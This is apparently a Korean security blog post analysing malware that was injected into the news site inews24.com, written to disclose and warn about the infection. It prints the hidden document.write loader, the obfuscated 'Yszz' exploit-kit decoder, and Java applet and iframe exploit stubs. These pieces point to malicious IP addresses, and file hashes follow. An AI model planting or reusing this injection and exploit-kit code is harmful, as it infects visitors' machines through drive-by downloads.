이제는 지친다!!! inews24.com 에서 유포중이다!
주말마다 관리자는 무엇을 하고있을까??
내부 소스에는 이와같이 스페이스와 탭으로 이루어진! 스크립트가 삽입!
document.write(unescape("%3Cscript%20src%3Dhttp%3A%2F%2F205%2E164%2E5%2E190%2Fpic%2Fimg%2Ejs%3E%3C%2Fscript%3E"));
--------------------------------------------------------------------------------------------
<script src=http://205.164.5.190/pic/img.js>
~>http://205.164.5.190/pic/img.html (Yszz 1.3 vip)
~>http://205.164.5.190/pic/swfobject.js
~>http://205.164.5.190/pic/jpg.js
~>http://205.164.5.190/pic/css.html (취약점 미삽입!)
~> http://count24.51yes.com/click.aspx?id=249419322&logo=1
(Yszz 1.3 vip)
var MDIxo="%78"+"%6F";
var OIai8="%78"+"%6F"+"%31";
생략
var ERb7H="%6F"+"%78";
var XGpwn2 =MDIxo+OIai8+HHYWv+CvXWz+JZyjl+ERb7H,AVgHbu2f=unescape,Cn6T4bG0znIi="aQCLHa58Cy3fSGI3MeP1sEO
KRLywbDXIIzBxULkgBn/D0nB/kT9MVqK/29rPw+7wspSSX4qYH3H4TMrS3lDaseKuZ+5ydruhSG6XAlVl81Fqy/9y5cz3aprjhQx6MLTaMoj9q650TsrPzkXNwh+Z77NWOlZvxX7bOFMlKO7BdlwwlwnujykUFSoyNi8snQ+N90mn7nOnAIzNndUPtUkLV/+B1YT9M1u+RRtR7fwCuD1F07IFFzf1aSbcqtdf2NMKG6xhSPeynlrxqj3uDGf41xlplDX8xIv0fepd4XsS+jZP0D0iy/B5RfpVqyMzuBPycllafgA9zCmrLhtJ0OmdlfXsc22xMemu1U6BxUyQMGxAokvOwqpdb+W9Sk2QCmcqsMewdHbk/Jfbqbee2cW9YtHv29tJaQo8WB7+7fZvONnukFDbr3ifuZTi6aT3gB4mHIazWfWZzKBTqhU2Nq
SqIM8cUmhw6TD+Wu/rlVT5SWujvvnaX9xYRSaNmOfrcrdRlS8838eJuA9RF
생략
+5f/QUEljDMY7HL0QPa0a087YViC/IbXMKTHlhaKoQM+IOuE5Gwz3GjltVa+yIvONfdD+c2uDwP4Q=",HUx2Ydz="%64"+"%6f"+"%63"+"%75"+"%6d"+"%65"+"%6e"+"%74",
sac5pxhFS="%77"+"%72"+"%69"+"%74"+"%65",ubo8KLEZHIPX2;
var B83pNx = "%53"+"%74"+"%72"+"%69"+"%6e"+"%67";
var WjuQFO = "%66"+"%72"+"%6f"+"%6d"+"%43"+"%68"+"%61"+"%72"+"%43"+"%6f"+"%64"+"%65";
var fxTmFiR = AVgHbu2f(B83pNx);
var xZW9RVt = AVgHbu2f(WjuQFO);
var sATWUn = "%41"+"%72"+"%72"+"%61"+"%79";
var x83QqGV = AVgHbu2f(sATWUn);
function tzWmUni(str){var out,i,len,c;var char2,char3;out=[];len=str.length;i=0;while(i<len){c=str.charCodeAt(i++);switch(c>>4)
{case 0:case 1:case 2:case 3:case 4:case 5:case 6:case 7:out[out.length]=str.charAt(i-1);break;case 12:case 13:char2=str.charCodeAt(i++);out[out.length]=window[fxTmFiR][xZW9RVt](((c&0x1F)<<6)|(char2&0x3F));break;case 14:char2=str.charCodeAt(i++);char3=str.charCodeAt(i++);out[out.length]=window[fxTmFiR][xZW9RVt](((c&0x0F)<<12)|((char2&0x3F)<<6)|((char3&0x3F)<<0));break;}}
return out.join('');}
var ZjykejU6Chars=new window[x83QqGV](-1,-1,-1,생략7,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,4
7,48,49,50,51,-1,-1,-1,-1,-1);
HUx2Ydz=AVgHbu2f(HUx2Ydz);
function ZjykejU6(str)
{var YS1,YS2,YS3,YS4;/*Yszz 1.3 vip*/var i,len,out;
len=str.length;i=0;out = "";
while(i<len)
{do{YS1=ZjykejU6Chars[str.charCodeAt(i++)&0xff]}while(i<len&&YS1==-1);
if(YS1==-1)
break;do{YS2=ZjykejU6Chars[str.charCodeAt(i++)&0xff]}while(i<len&&YS2==-1);
if(YS2==-1)
break;out+=window[fxTmFiR][xZW9RVt]((YS1<<2)|((YS2&0x30)>>4));
do{YS3=str.charCodeAt(i++)&0xff;if(YS3==61)
return out;
YS3=ZjykejU6Chars[YS3]}while(i<len&&YS3==-1);
if(YS3==-1)
break;out+=window[fxTmFiR][xZW9RVt](((YS2&0XF)<<4)|((YS3&0x3C)>>2));
do{YS4=str.charCodeAt(i++)&0xff;if(YS4==61)
return out;YS4=ZjykejU6Chars[YS4]}while(i<len&&YS4==-1);if(YS4==-1)
break;out+=window[fxTmFiR][xZW9RVt](((YS3&0x03)<<6)|YS4)}
return out}
function long2str(v,w){var vl=v.length;var sl=v[vl-1]&0xffffffff;for(var i=0;i<vl;i++)
{v[i]=window[fxTmFiR][xZW9RVt](v[i]&0xff,v[i]>>>8&0xff,v[i]>>>16&0xff,v[i]>>>24&0xff);}
if(w){return v.join('').substring(0,sl);}
else{return v.join('');}}
function str2long(s,w){var len=s.length;var v=[];for(var i=0;i<len;i+=4)
{v[i>>2]=s.charCodeAt(i)|s.charCodeAt(i+1)<<8|s.charCodeAt(i+2)<<16|s.charCodeAt(i+3)<<24;}
if(w){v[v.length]=len;}
return v;}
ubo8KLEZHIPX2=AVgHbu2f(XGpwn2);
function kaixin(str,Udkz){if(str==""){return"";}
var v=str2long(str,false);var k=str2long(Udkz,false);var n=v.length-1;var z=v[n-1],y=v[0],delta=0x9E3779B9;var mx,e,q=Math.floor(6+52/(n+1)),sum=q*delta&0xffffffff;while(sum!=0){e=sum>>>2&3;for(var p=n;p>0;p--){z=v[p-1];mx=(z>>>5^y<<2)+(y>>>3^z<<4)^(sum^y)+(k[p&3^e]^z);y=v[p]=v[p]-mx&0xffffffff;}
z=v[n];mx=(z>>>5^y<<2)+(y>>>3^z<<4)^(sum^y)+(k[p&3^e]^z);y=v[0]=v[0]-mx&0xffffffff;sum=sum-delta&0xffffffff;}
return long2str(v,true);}
sac5pxhFS=AVgHbu2f(sac5pxhFS);
JS0W=Cn6T4bG0znIi;
JS0W=tzWmUni(kaixin(ZjykejU6(JS0W), ubo8KLEZHIPX2));
window[HUx2Ydz][sac5pxhFS] (JS0W);
-----------------------------------------------------------------------------------------------
중요한 부분!
kaixin.archive="K03rSYoG.jpg";
kaixin.code="GondadGondadExp.class";
kaixin.setAttribute("dota","http://209.73.158.76/css/img.css");
document.body.appendChild(kaixin);
OBJECT classid='clsid:8AD9C840-044E-11D1-B3E9-00805F499D93'
document.write("<br>");
var kaixinq = document.createElement("body");
document.body.appendChild(kaixinq);
var kaixiny = document.createElement("applet");
kaixiny.width = "256";
kaixiny.height = "256";
kaixiny.archive = "tRMfS.jpg";
kaixiny.code = "cve2012xxxx.Gondvv.class";
kaixiny.setAttribute("xiaomaolv", "http://209.73.158.76/css/img.css");
kaixiny.setAttribute("bn", "woyouyizhixiaomaolv");
kaixiny.setAttribute("si", "conglaiyebuqi");
kaixiny.setAttribute("bs", "748");
document.body.appendChild(kaixiny);
else {
var pcss=navigator.userAgent.toLowerCase();
var UaYcKzD2 = window.navigator.userAgent.toLowerCase();
if ((UaYcKzD2.indexOf('msie 8.0') > -1))
{
document.writeln("<iframe src=LihTNR.html(
Yszz 1.3 vip
)><\/iframe>");
}
else if ((UaYcKzD2.indexOf('msie 6.0') > -1) || (UaYcKzD2.indexOf('msie 7.0') > -1))
{
document.writeln("<iframe src=mO4b9.html(
Yszz 1.3 vip
)><\/iframe>");
}
연결지 정리 !
* 접속이 되어서 감염시 본인의 책임이라는 것을 알려 드립니다!
http://205.164.5.190/pic/img.js
~>http://205.164.5.190/pic/img.html (Yszz 1.3 vip)
~> http://209.73.158.76/css/img.css (최종파일)
~> tRMfS.jpg,
cve2012xxxx.Gondvv.class, mO4b9.html, LihTNR.html
~>http://205.164.5.190/pic/swfobject.js
~>http://205.164.5.190/pic/jpg.js
~>http://205.164.5.190/pic/css.html (취약점 미삽입!)
~>http://count24.51yes.com/click.aspx?id=249419322&logo=1
MD5 및 바이러스 토탈 결과 !
fd095a3357e85b4f4e5c27a9269ca021 css.html
bf1ca09bb8d9198d852a6b1ba68a355d Gondvv.class
acb18b560c15f972dbfbe7df5b5a8ae7 Gondzz.class
140c02cb07a6bf56a7b4a22020f03716 img.css
3c15a098eac02881b93014685a766674 img.html
6987108c7f85c4b6f097598433a3819f img.js
97c9b5b98c75bc4d20ccd6f8e28b0a7b jpg.js
6c6799dd660ceda52cf31a46a34e3e3c LihTNR.html
5a38c126e782bc11206c7237967ad8f3 mO4b9.html
de89a5739a7e333071160a552aa32b63 swfobject.js
8990ccdbed763ef8aa3943b085313f88 tRMfS.zip
샘플 필요시 댓글 주세요! 
아이뉴스 샘플.zip * 암호 설정중!
지난 아이뉴스 유포 글!
2012/09/01 - [security/악성코드 유포] - http://www.inews24.com 악성코드 유포중 !
2012/06/30 - [security/악성코드 유포] - 악성코드 유포중에 있는 inews24.com 악성 스크립트 정리 !
2012/06/29 - [security/악성코드 유포] - inews24.com 내에 공백을 이용한 악성 스크립트 살펴보기 !
'security > 악성코드 유포' 카테고리의 다른 글
| 짱라이브(jjang Live) 특정 페이지내 악성코드 유포중! (1) | 2012.10.03 |
|---|---|
| [Sophos] 9백만 대 이상의 PC 감염 - 제로액세스 봇넷 무방비 (0) | 2012.10.02 |
| m914.txt 악성코드 내에 일부분! (0) | 2012.09.17 |
| http://www.inews24.com 악성코드 유포중 ! (0) | 2012.09.01 |
| 인제대학교 일어일문학과 http://homepage.inje.ac.kr/~japan/xe/index.php?mid=main 악성 코드 유포중 ! (0) | 2012.08.25 |